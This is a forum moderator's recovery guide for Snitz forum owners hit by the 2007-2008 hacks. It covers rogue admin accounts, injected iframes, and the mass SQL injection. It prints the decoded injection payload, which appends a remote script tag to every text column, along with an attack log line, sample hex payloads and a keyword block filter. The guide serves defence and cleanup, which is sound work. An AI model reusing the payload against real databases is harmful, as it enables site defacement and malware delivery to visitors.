Snitz Forums 2000
 If you've been hacked (Updated: 2008-06-14)
AnonJr
Moderator
Posted - 18 December 2007 :  13:31:49  Show Profile  Visit AnonJr's Homepage
There have been a number of people hit by a hacker (or group of hackers) who are taking advantage of those who have not applied the latest security patch(es) and/or have other vulnerabilities in their code due to old/insecure MODs and/or custom additions.

As a result, we've been getting a steady stream of people with essentially the same post - "I've been hacked/My forum has a virus - now what?" So here's the answer as it stands so far:

Check the "Announcements: Security Related Bug Fixes" forum - and subscribe to it so you'll be notified of any other issues that pop up. This is probably a result of the issue that was patched on 1 Dec 2007.

I'd also take a look through the "DEV Bug Reports (Open)" forum and fix any other outstanding issues. (Assuming you haven't already)

After applying all the patches I would go to the Admin Options and check the "Admin/Moderator List" to see if they created any extra Admin accounts. If you find an account that is set up as an Admin - but shouldn't be - demote them and then lock the account. This prevents them from using the same account name and e-mail address.

In some cases - mainly people who have added an early version of the Dec. patch - the unsuccessful hack attempt causes a "Type Mismatch" error to occur on the members.asp page where the hacker's account is listed.

To fix a "broken" members.asp page, you should do the following:

  1. Log in as the Super Admin (usually the very first account created when you set up the forum) and go to Admin Options, then select "(Alternate MOD Setup)".

  2. Paste the following code into the box:
     [UPDATE]
     MEMBERS
     M_LASTHEREDATE#'20080414000000'#MEMBER_ID = IDOFDODGYUSER
     [END]
     Replace IDOFDODGYUSER with the numeric ID of the last user displayed in the broken list; this will be the attempted hacker. If you hover your mouse over the name of the account on members.asp, you'll see the ID in the URL on the status bar at the bottom of your browser.

     The date/time is stored as a string in YYYYMMDDHHMMSS format; just use the current date (the example shows 14 April 2008).

  3. Press the submit button and it should sort out the problem with members.asp. Don't forget to lock the account afterwards...

    Then I'd go through all the other Admin Options to see what might have been changed. Make sure they didn't enable HTML (assuming you didn't have it enabled to begin with). Pay close attention to the text for down.asp (usually entered in when you click on "Shut Down the Forum" from the admin page). They seem to like to stick some <iframe /> or other HTML in there that pulls various ActiveX controls etc. that you really don't want. I'd really check this first so you can shut the forum down while you work on the rest - that way they can't jack with anything else while you are doing your cleanup.

    While you are in the Admin Options, don't forget to check the bad words filter. Some sly individuals have been using it to substitute various words with links to scripts etc.

    Next up is to run through the forum descriptions for every forum you have. Go to "Edit Forum Properties" for each and every forum you have set up and check whether they added any <iframe /> or other unwanted HTML to the forum's description. As with down.asp, they've been known to add all sorts of fun stuff there...

    Then I'd start going through the files and see if any had been modified or if there are any new files that weren't there before. Odds are that you aren't going to find anything here if your admins don't have some sort of upload access to the server.

    For the most part they've been limited to only the kind of havoc an Admin account can inflict. While they won't be able to change passwords for other admin accounts, they could play with your moderators' accounts - you may want to let all your moderators know that they should check/change their passwords.

    As I mentioned at the beginning, some of these hacks are not the result of Snitz itself, but are being perpetrated through other avenues in the site. In the server logs you'll see something like:
    2008-06-13 07:34:55 xxx.xxx.xxx.xxx GET /forum/topic.asp TOPIC_ID=2486;DECLARE%20@S%20VARCHAR(4000);..{some big long string}..

    If you paste the hex portion of the code into the converter found here, you'll see the SQL it was trying to run. Typically something like:
    DECLARE @T VARCHAR(255),@C VARCHAR(255)
    DECLARE Table_Cursor CURSOR FOR
      SELECT a.name,b.name FROM sysobjects a,syscolumns b
      WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN
      EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.differenturls.com/b.js></script>''')
      FETCH NEXT FROM Table_Cursor INTO @T,@C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor



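    As an added example (not code from this post, from Snitz, or from any of the people quoted here), the following Python script triages IIS log lines in the layout shown above: it flags requests containing the same three tokens (";", "declare", "cast") that the common-header check further down this post looks for, decodes the hex blob inside CAST(0x... AS [N]VARCHAR(...)) so you can read the injected SQL offline instead of pasting it into a converter, and pulls out the <script src=...> it tries to append. The log lines, the PAYLOAD text and the domain malicious.example are constructed sample data.

```python
import re
from urllib.parse import unquote_plus

# Hex blob inside CAST(0x... AS VARCHAR(n)) or CAST(0x... AS NVARCHAR(n)).
CAST_HEX = re.compile(r"CAST\(\s*0x([0-9A-F]+)\s+AS\s+(N?)VARCHAR", re.I)
SCRIPT_SRC = re.compile(r"<script\s+src=([^>\s]+)", re.I)
FILTER_TOKENS = (";", "declare", "cast")  # same tokens as the header check

def decode_cast_payload(query):
    """Return the SQL hidden in the CAST hex blob, or None if there is none.
    NVARCHAR hex is UTF-16LE; VARCHAR hex is one byte per character."""
    m = CAST_HEX.search(unquote_plus(query))
    if not m:
        return None
    raw = bytes.fromhex(m.group(1))
    return raw.decode("utf-16-le" if m.group(2) else "latin-1", errors="replace")

def triage_log_line(line):
    """Parse 'date time c-ip method uri-stem uri-query' and report filter hits,
    the decoded SQL and any <script src=...> the payload tries to append."""
    parts = line.split(None, 5)
    if len(parts) < 6:
        return None
    _date, _time, ip, _method, stem, query = parts
    hits = [t for t in FILTER_TOKENS if t in query.lower()]
    if not hits:
        return None
    sql = decode_cast_payload(query)
    src = SCRIPT_SRC.search(sql or "")
    return {"ip": ip, "stem": stem, "hits": hits, "sql": sql,
            "script_src": src.group(1) if src else None}

def triage(lines):
    return [r for r in map(triage_log_line, lines) if r]

# --- constructed sample input, not real traffic ---
PAYLOAD = ("DECLARE @T VARCHAR(255),@C VARCHAR(255) "
           "EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(['+@C+'])"
           "+''<script src=http://malicious.example/b.js></script>''')")

def _hex(sql, nvarchar):  # used only to build the sample lines below
    return sql.encode("utf-16-le" if nvarchar else "latin-1").hex().upper()

SAMPLE_LOG = [
    "2008-06-13 07:34:50 203.0.113.5 GET /forum/topic.asp TOPIC_ID=2486",
    "2008-06-13 07:34:55 203.0.113.9 GET /forum/topic.asp TOPIC_ID=2486;DECLARE%20@S%20VARCHAR(4000);"
    "SET%20@S=CAST(0x" + _hex(PAYLOAD, False) + "%20AS%20VARCHAR(4000));EXEC(@S);--",
    "2008-06-13 07:35:01 203.0.113.9 GET /forum/default.asp CAT_ID=1;DECLARE%20@S%20NVARCHAR(4000);"
    "SET%20@S=CAST(0x" + _hex(PAYLOAD, True) + "%20AS%20NVARCHAR(4000));EXEC(@S);--",
]
```

    Call triage(SAMPLE_LOG) (or feed it the lines of your own log file) and inspect the "sql" and "script_src" keys of each result; the benign first line produces no result at all.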
    Astralis has posted some code to help clean the script from the database. Here's what he'd posted:
    quote:
    Several things:

    1) This hack had nothing to do with Snitz. They didn't change the member levels as I initially believed.
    2) I discovered that some of my SQL Injection script simply DID NOT work. Lesson: Test your injection script!
    3) Back up your database.
    4) Many people are dealing with this right now. I used the following script to go through the rows quickly. Bill Wilkinson on www.ASPMessageboard.com wrote it. Depending on the size of your database, run it on just a couple of fields at a time. This is what I used to update the Snitz Member's table.

    Set zap = New RegExp
    zap.Pattern = "\<" & "script[\s\S]*?\<\/script\>"
    zap.IgnoreCase = True
    zap.Global = True

    '#### CAUTION ####
    '  Either this regexp or the script injection trimmed a couple of
    '  the text fields such as M_SIG while deleting the injection.  I
    '  simply told my members to recreate it.  I suspect it was the script
    '  injection, though. There are other fields you need to add...it's
    '  self-explanatory if you compare it with your database table design.
    '  Uncomment only a couple of fields at a time.  If you try to run
    '  them all at the same time your database will timeout.
    '
    '  Also, if you have a field that is NULL, run the code using this
    '  model or else you will get errors:
    '
    '    uname = RS("username")
    '    If Not IsNull(uname) Then If uname <> "" Then RS("username") = zap.Replace(uname,"")
    '
    '############

    ' CleanField applies the NULL-safe model above to one column of the
    ' current record, so zap.Replace is never handed a Null value.
    Sub CleanField(fieldName)
        Dim v
        v = RS(fieldName)
        If Not IsNull(v) Then
            If v <> "" Then RS(fieldName) = zap.Replace(v, "")
        End If
    End Sub

    Set RS = Server.CreateObject("ADODB.Recordset")
    ' openyourconnection is a placeholder for your own open ADODB.Connection
    ' object; 3, 3 = adOpenStatic, adLockOptimistic (an updatable cursor)
    RS.Open "FORUM_MEMBERS", openyourconnection, 3, 3
    Do Until RS.EOF
        'CleanField "M_AIM"
        'CleanField "M_ICQ"
        'CleanField "M_Yahoo"
        'CleanField "M_MSN"
        'CleanField "M_FIRSTNAME"
        'CleanField "M_LASTNAME"
        'CleanField "M_OCCUPATION"
        'CleanField "M_SEX"
        'CleanField "M_HOBBIES"
        'CleanField "M_LNEWS"
        'CleanField "M_QUOTE"
        'CleanField "M_MARSTATUS"
        'CleanField "M_BIO"
        'CleanField "M_LINK1"
        'CleanField "M_LINK2"
        'CleanField "M_CITY"
        'CleanField "M_STATE"
        'CleanField "M_KEY"
        'CleanField "M_PWKEY"
        'CleanField "M_PHOTO_URL"
        'CleanField "M_NEWEMAIL"
        'CleanField "M_PMBLOCKLIST"
        RS.Update
        RS.MoveNext
    Loop
    RS.Close
    Response.Write "finished"



    Podge has posted a temporary fix (a better variation of what fubardk had posted earlier in that thread) for those that haven't found out where it's getting through. As long as your site has some sort of common header file, you can paste the following into it and it will ameliorate part of the problem. Please note this is not a permanent fix, nor is it something that is impossible to work around - it just makes it that much harder for the hacker to get in.
    if instr(request.querystring,";")>0 or instr(lcase(request.querystring),"declare") >0 or instr(lcase(request.querystring),"cast")>0 then Response.End



    For those using MS SQL Server, Classicmotorcycling has posted something of a more permanent fix:
    quote:
    The fix I have found to stop it happening is to restore to the latest good backup of your Database (unless you want to go through each table and its fields and remove it), then in Query Analyzer run the following:
    DENY SELECT ON SYSOBJECTS TO [User listed in config.asp of your forum]
    DENY SELECT ON SYSCOLUMNS TO [User listed in config.asp of your forum]

    As an example:
    DENY SELECT ON SYSOBJECTS TO Snitz_User
    DENY SELECT ON SYSCOLUMNS TO Snitz_User



    It does come with one caveat:
    quote:
    Originally posted by ruirib
    You should be aware that's not really a fix. It will stop that kind of hack, but the hole is still there and it can be used to inject different SQL. You should not really relax with such a fix. It will avoid some of the symptoms of your problem, but it won't solve the problem.
    For example, using the same searching strategy and knowing the Snitz table names, nothing stops them from dropping all your tables and this fix won't stop it.

    As hard as that may be, there is no way around sanitizing all your input. If you don't do that, the hole is still there to be used by those who search for it with enough persistence!



    Most of the common problems (and some not so common ones) have been addressed in the forums already. I add those issues and solutions here as I have time. If you don't find what you need in this topic, please do a search before starting a new one.

    If you are still having problems after having done all this (including searching), post a new topic in this forum with: a descriptive title, what you have tried and/or are having trouble with, and a description of the problem. We'll get you back up and running come hell or high water.

    2008-06-14: Updated to include information on non-snitz related hacks, and solutions posted by Astralis, fubardk, Podge, and Classicmotorcycling.

    2008-05-06: Updated to include information about the sly use of the bad words filter.

    2008-04-28: Updated to include information on the "broken" members.asp page as well as how to fix it. Also fixed some typos and minor verbiage changes.

    2008-04-23: Updated to include some keywords that people seem to be looking for instead of the typical ones... and to refine the wording here and there. Nothing truly new for those that have read it before.

    Edited by - AnonJr on 14 June 2008 19:33:31